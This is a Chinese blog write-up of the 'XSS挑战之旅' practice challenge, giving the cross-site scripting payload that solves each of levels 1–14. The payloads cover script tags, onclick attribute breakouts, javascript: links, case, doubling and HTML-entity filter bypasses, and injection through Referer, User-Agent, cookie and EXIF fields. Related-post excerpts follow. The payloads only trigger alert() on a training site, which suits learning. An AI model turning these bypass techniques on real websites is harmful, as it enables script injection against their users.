XSS挑战之旅 解题记录

最新推荐文章于 2025-05-24 10:58:45 发布
最新推荐文章于 2025-05-24 10:58:45 发布
阅读量6.1k 收藏 18
点赞数 2
CC 4.0 BY-SA版权
分类专栏: xss 文章标签: xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/chen_yi_ang/article/details/77875669

本文记录xss挑战解题,检验自己的xss技术
题目链接
Level1
链接为http://test.xss.tv/level1.php?name=test
页面没有输入点
直接构造payloadname=<script>alert(1)</script>

Level2
一样简单,给出payload"><script>alert(1)</script>

Level3
过滤了尖括号
故用`’ οnclick=alert(1)//

Level4
和L3一样,不同的是这里用双引号闭合
" onclick=alert(1)//

Level5
用上面的进行尝试,发现将onclick变成o_nclick
这里改用添加链接方式
"><a href="javascript:alert(1)">
然后点击链接即可

Level6
这里也将href过滤成hr_ef
这里用大小写绕过过滤
"><a hrEf="javascript:alert(1)">

Level7
这里直接将href script删除
于是采用机智方法
"><a hrhrefef="javascrscriptipt:alert(1)">

Level8
这里可以添加链接到页面
于是直接javascript:alert(1)
但是不行因为会将script过滤成scr_ipt
这里采用HTML字符实体转换
将script转化成&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;
最后payload java&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;:alert(1)

Level9
使用上关的payload,被提示不合法,说明对链接进行了格式要求
这里尝试了很多次,最后看到网上的解答,吐血
因为这里只需要有http://即可
java&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;:alert(&#x22;http://")
值得一提的是双引号会被过滤,于是第一个双引号用实体转换机即可

Level10
看源码,发现有几个type=hidden的输入框
于是使其显示并可以onclick触发事件
http://test.xss.tv/level10.php?t_sort=4" onclick=alert(1) type="text"

Level11
看源码,有个是显示referer
<input name="t_ref" value="http://test.xss.tv/level10.php?t_sort=4%22%20onclick=alert(1)%20type=%22text%22" type="hidden">
这里也是尝试很多次,但是始终无法使得输入框改变type
最后百度得出要抓包改referer即可
修改referer=12356" onclick=alert(1) type=text

Level12
和上一关类似,这次修改user-agent
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0" onclick=alert(1) type="text"

Level13
看网页源码有个输入框叫cook,故去看看cookie
果然有个cookie值为call me maybe
修改cookiecall me maybe?" onclick=alert(1) type="text"

Level14
这里也是没思绪
百度得出答案,这里用的是乌云爆出的exif viewer的漏洞
修改图片exif信息如标题、作者' "><img src=1 onerror=alert(document.domain)>即可
之后第15关的链接失效了,就没做下去了

Xss挑战之旅-WriteUp(前13关)
m0_46394638的博客
11-03 438
Xss挑战之旅-WriteUp(前13关) 作为荒废已久的小菜鸡恰巧这几天比较有时间,想重新整理一下XSS的笔记,于是找到搭建的xss实验靶场,重新练练手。顺手写下自己的一个解题思路,当做笔记总结。WriteUp如有错误或有更好的办法,还请大佬指教! 另附XSS挑战之旅靶场源码下载链接:https://pan.baidu.com/s/1Lw-jGb5TMddPWY8lFAn8yw 提取码:rtrg 测试字符:<'"{()}> 第一关 上测试字符,查看源码。看一下字符过滤情况,...
XSS挑战之旅练习1-13
m0_53223419的博客
03-16 344
使用docker搭建靶场。
xss挑战之旅学习笔记
weixin_44300286的博客
06-07 521
前言:前几天学了xss攻击,觉得有必要写一篇博客记录一下。
XSS Lab 前 5 关通关攻略:从入门到实战
最新发布
qq_74175927的博客
05-24 789
本文分享了XSSLab前5关的通关技巧,从基础注入到绕过过滤机制。Level1通过<script>标签直接注入;Level2构造闭合标签打破双引号包裹;Level3利用单引号和事件触发;Level4在尖括号被过滤时使用属性闭合;Level5通过超链接替代<script>标签。文章总结了XSS攻击的核心思路:寻找输入点、构造有效Payload、灵活运用替代方法,并提供了防御建议,包括输入过滤、输出转义和使用HTTP-only Cookie。通过这些实战练习,读者可以直观理解XSS攻击原理及防护措施。
XSS挑战之旅,学习笔记
qq_43573131的博客
11-28 817
因为我是边做边写博客,所以快捷目录就先不弄了,闲了再弄 最近把xss认真的好好过一边,于是先找了个早一点的题 xss挑战之旅嘿嘿 第一关: http://test.ctf8.com/level1.php?name=test 观察到通过get方式传参有会显, 直接打最简单的xss playload: <script>alert(1);</script> 第二关: http...
XSS quiz 6~10解题方案
CClarence的专栏
12-13 2424
第六题 本题转义了尖括号。并且根据Hint:event handle attributes,意思就是像input标签里进行添加事件,于是尝试通过不用尖括号的方式写入xss语句。 先用\u003c和\u003e来代替<和>,失败。 用” onmousemove=”alert(document.domain) 成功。 第七题 Hint,Hint: nearly the same… but a
test.xss.tv
沐目的博客
07-09 773
集训第二周 星期一(下) 下午接着XSS,先放靶场 http://test.xss.tv/level1.php?name=test level 1 这一题也没什么,主要就是找到注入点,让name等于test23,看下页面源码,发现只有一个地方出现了我们输入得东西。于是我们构造payload <script>alert(1)</script> level 2 这个我就极其得...
靶场通关-XSS挑战之旅(1-5)
m0_56634355的博客
06-04 1651
直接使用在线靶场网址:https://xss.angelo.org.cn本地搭建xss靶场,这个简单百度吧点击图片后,进入下图:我们可以看到用于js弹窗的代码顺利执行了 看看源码,分析一下 接下来去服务器端看看这一关的源码......
XSS挑战之旅[全20关]上
ldkpolite007的博客
05-06 2784
Contents 0x01 0x02 0x03 0x04 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编辑器, 可以仔细阅读这篇文章,了解一下Markdown的基本语法知识。 新的改变 我们对Markdown编辑器进行了一些功能拓展与语法支持,除了标准的Markdown编辑器功能,我们增加了如下几点新功能,帮助你用它写博客: 全新的界面设计 ,将会带来全新的写作体验; 在创作中心设置你喜爱的代码高亮样式,Markdown 将代码片显示选择的高亮样式
使用docker搭建xss挑战之旅环境
DXfighting_的博客
04-14 1186
docker search XSS-challenge-tour 搜索镜像 Docker pull 下载镜像 Docker images 查看存在镜像 dockerrun-dt--nameXSS-challenge-tour-p84:80--rmc0ny1/XSS-challenge-tour,运行镜像文件 打开网页,查看是否成功 ...
xss挑战之旅通关记录
None安全团队
11-12 1024
xss挑战之旅通关记录 level1 没有任何过滤,直接URL后面加XSS测试语句弹窗 exp: http://localhost/xss_test/level1.php?name=123<script>alert('123')</script>; level2 有搜索框,像第一关一样在搜索框测试一下,但是没有像第一关一样弹窗 查看源码发现我们的XSS语句被赋值给value并且在input标签里,所以我们需要闭合value和input标签就可以正常弹..
XSS20关练习源码
09-04
包含20关XSS练习的源码。文件都为PHP类型,下载个phpstudy就可以搭建起来了。我已经通过了,所以共享出来给大家练习。
testXSS <img src="aa" onerror="javascript:alert('XSS');"/>
weixin_30329623的博客
05-07 148
adsa </p><img src="aa" onerror="javascript:alert('XSS');"/><p> 转载于:https://www.cnblogs.com/kuiyeit/p/6822093.html
XSS挑战之旅关卡讲解
hanjunhao2002的博客
03-10 159
首先他将“”变为了",而且还将scrpt和on等语句之间加入了下划线,怎么解决呢,。其实,我们可以直接输入javascript:alert(1),将script用实体编号绕过。也可以对script的一个字母进行实体编号。完成!
XSS挑战赛(xsslabs)1~10关通关解析
黄乔国PHP
03-06 1391
XSS挑战赛,里面包含了各种XSS的防御方式和绕过方式,好好掌握里面的绕过细节,有助于我们更好的去发现XSS漏洞以及XSS的防御。本文更多的是分享解析的细节,不是一个标准的答案,希望大家在渗透的时候有更多的思维。
xss挑战之旅level1-level4,操作步骤配截图
qq_56424902的博客
03-07 366
xss挑战之旅level1-level4,操作步骤配截图。 查看源代码发现弹窗直接属于语句令其弹窗 (2)提前闭合 (3)与第二题一样value提前闭合 (4)与第二题一样 ...
xss-challenge(挑战之旅1~13)
weixin_55404107的博客
10-21 430
好。
xss挑战(超详细小白)
weixin_64655821的博客
09-22 1517
xss挑战前十关
XSS挑战第一期Writeup
weixin_33790053的博客
03-08 441
mramydnei · 2014/01/25 20:440x00 起因这期 XSS 挑战的起因是在阅读“Modern Web Application Firewalls Fingerprinting and Bypassing XSS Filters”过后,在其中发现了一个很有趣的话题。那就是在圆括号被过滤的情况下,如何去执行javascript。在文中笔者给出来了这样的解决方案:#!html &...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值